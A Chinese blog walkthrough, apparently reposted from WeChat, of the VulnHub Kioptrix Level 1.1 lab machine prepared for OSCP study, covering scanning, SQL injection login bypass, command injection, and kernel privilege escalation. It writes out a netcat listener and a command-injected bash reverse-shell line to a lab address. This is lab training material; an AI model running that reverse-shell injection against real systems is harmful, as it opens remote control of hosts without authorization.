VulnHub靶机 | Kioptrix-Level 1.1

admin 2024年11月20日14:08:27评论5 views字数 680阅读2分16秒阅读模式

OSCP备考系列 第0x02篇笔记。

    笔记顺序参考官方靶场(节选)

OSCP官方推荐靶场https://docs.google.com/spreadsheets/u/0/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/htmlview?pli=1#

靶机地址:

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

01.主机发现

VulnHub靶机 | Kioptrix-Level 1.1

02.对发现的主机进行信息收集

a..端口探测

    发现80端口开放 尝试访问

VulnHub靶机 | Kioptrix-Level 1.1

b.对目标靶机进行目录扫描

VulnHub靶机 | Kioptrix-Level 1.1

判断网站的指纹信息:

VulnHub靶机 | Kioptrix-Level 1.1

登录口 检测注入点:找到了用户名和密码

VulnHub靶机 | Kioptrix-Level 1.1

VulnHub靶机 | Kioptrix-Level 1.1

登录以后发现是一个命令执行的输入口:

VulnHub靶机 | Kioptrix-Level 1.1

VulnHub靶机 | Kioptrix-Level 1.1

反弹shell:查看系统版本查找漏洞

监听:nc -lvvp 5454

127.0.0.1 | bash -i >& /dev/tcp/192.168.0.110/5454 0>&1

VulnHub靶机 | Kioptrix-Level 1.1

查看操作系统、内核版本

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

VulnHub靶机 | Kioptrix-Level 1.1

查找系统存在的漏洞:

VulnHub靶机 | Kioptrix-Level 1.1

然后把对应的EXP下载到本地:

VulnHub靶机 | Kioptrix-Level 1.1

本地起http服务:

VulnHub靶机 | Kioptrix-Level 1.1

在目标机器里面:下载该exp文件

VulnHub靶机 | Kioptrix-Level 1.1

编译下载的文件:

运行编译后的文件 获取到当前机器的ROOT权限

VulnHub靶机 | Kioptrix-Level 1.1

总结:

参考内容:https://www.cnblogs.com/wsec/p/vulnhub0x02.html

原文始发于微信公众号(0x00实验室):VulnHub靶机 | Kioptrix-Level 1.1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月20日14:08:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VulnHub靶机 | Kioptrix-Level 1.1https://cn-sec.com/archives/3413158.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息